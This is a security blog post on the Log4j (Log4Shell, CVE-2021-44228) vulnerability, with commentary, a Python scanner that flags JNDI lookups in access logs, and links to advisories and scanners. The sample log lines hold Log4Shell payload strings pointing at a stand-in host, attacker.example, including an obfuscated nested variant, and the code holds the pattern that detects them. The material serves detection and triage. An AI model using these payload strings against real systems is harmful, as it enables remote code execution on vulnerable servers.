h0w1tzr’s Commentary: This is a REALLY nasty bug that has been not only seen in the wild but wormable payloads have also been seen. This is just the tip of the iceberg. It affects everything from Apache Web Servers to VMware vSphere to Atlassian Jira to Ghidra to ICS devices. Essentially anything that is written in Java could potentially be exploited. This is probably the worst bug since Heartbleed with even more ramifications. The good news, if there is any, is that this vulnerability doesn’t break out of the Java Virtual Machine (JVM) but you can remotely load Java classes that are being used to download a secondary payload.
On December 9, 2021, the Log4j vulnerability, tracked as CVE-2021-44228, was publicly revealed via the project’s GitHub. This page collects all the intelligence that Randori has gathered since the release of the vulnerability that impacts many types of software, and likely billions of devices.
This vulnerability, which was discovered by Chen Zhaojun of Alibaba Cloud Security Team, impacts Apache Log4j 2 versions 2.0 to 2.14.1.
This weakness allows arbitrary code execution. A logging utility such as Log4j is meant to let developers log various types of data within their applications; this data is typically based on user input, but does not have to be.
The Log4j vulnerability allows an attacker to load any code they want via the Log4j logging structure. Threat actors can point the logging protocol to a Java library of their choosing, and the logging framework loads it automatically.
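Because the weakness is triggered by attacker-controlled strings that reach a logger, the first defensive question is usually "which of my logs already carry such strings?". The following detector is an added example written for this page; it is not code from Randori, GreyNoise or the Log4j project. It scans constructed web-server access-log lines for the JNDI lookup form used by CVE-2021-44228, and it first collapses nested lookups (the `${lower:...}`, `${upper:...}` and `${name:-default}` forms) so that a lookup hidden inside another lookup is seen the way Log4j would resolve it. The sample log lines, the host name `attacker.example` and the narrow lookup grammar are assumptions made for the example; the normalizer is a detection aid, not a reimplementation of Log4j's lookup engine.

```python
import re

# Innermost "${...}" lookup: a body that contains no further "$", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The lookup form behind CVE-2021-44228, matched case-insensitively after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j-style lookups so a detector sees the resolved literal.

    Only three lookup forms are modelled (an assumption for this example):
      ${lower:x}      -> x lower-cased
      ${upper:x}      -> x upper-cased
      ${name:-x}      -> x (the default value of an unresolvable lookup)
    Any other innermost lookup (including ${jndi:...}) is left untouched.
    """

    def resolve(match: "re.Match[str]") -> str:
        body = match.group(1)
        if body.lower().startswith("lower:"):
            return body[len("lower:"):].lower()
        if body.lower().startswith("upper:"):
            return body[len("upper:"):].upper()
        if ":-" in body:
            return body.split(":-", 1)[1]
        return match.group(0)

    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_suspicious(line: str) -> bool:
    """True when the line carries a JNDI lookup, directly or after un-nesting."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan_log(lines):
    """Return (1-based line number, normalized line) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


# Constructed access-log sample: one benign request, one plain lookup in the
# User-Agent, one nested lookup, and one harmless "${...}" that must not alert.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:01:09 +0000] "GET /login HTTP/1.1" 200 221 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:15 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${lower:j}ndi:${lower:ldap}://attacker.example/b}"',
    '10.0.0.3 - - [10/Dec/2021:13:03:00 +0000] "GET /docs HTTP/1.1" 200 900 "-" '
    '"price is ${amount} dollars"',
]

if __name__ == "__main__":
    for number, normalized in scan_log(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

Run against the sample, the scanner reports lines 2 and 3 and stays quiet on the `${amount}` line; the third hit is reported in its resolved form, which is why a plain substring search for `${jndi:` alone is not enough for triage. Scanning logs only tells you who has already tried; it complements, rather than replaces, upgrading Log4j and inventorying the software listed in the links below.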
We estimate Log4j to be as far-reaching as the Heartbleed vulnerability and Shellshock combined. More than 2.5 billion devices run Java, and coupled with the fact that this vulnerability is extremely easy to exploit, the impact is likely very far-reaching.
Links
- Randori Article: https://www.randori.com/log4j-zero-day/
- Randori VMSA-2021-0028: VMware Log4Shell Impact & Remediations: https://www.randori.com/blog/vmsa-2021-0028-vmware-log4shell-impact-remediations/
- GreyNoise Exploit activity for Apache Log4j vulnerability – CVE-2021-44228: https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228
- GitHub Log4j overview related software: https://github.com/NCSC-NL/log4shell/tree/main/software
- CloudFlare Actual CVE-2021-44228 payloads captured in the wild: https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
- BlackHills YouTube Video: https://www.youtube.com/watch?v=igoDXnkYDy8
- Rumble Finding applications that use Log4J: https://www.rumble.run/blog/finding-log4j/
- Randori & GreyNoise Webinar: https://vital.wistia.com/medias/qo6vlome2r
Scanners
- BurpSuite Plugin: https://github.com/portswigger/log4shell-scanner
- LanSweeper Log4j Vulnerable Software Scanner: https://www.lansweeper.com/report/log4j-vulnerable-software-audit/
- Fenrir Log4Shell Scanner: https://github.com/Neo23x0/Fenrir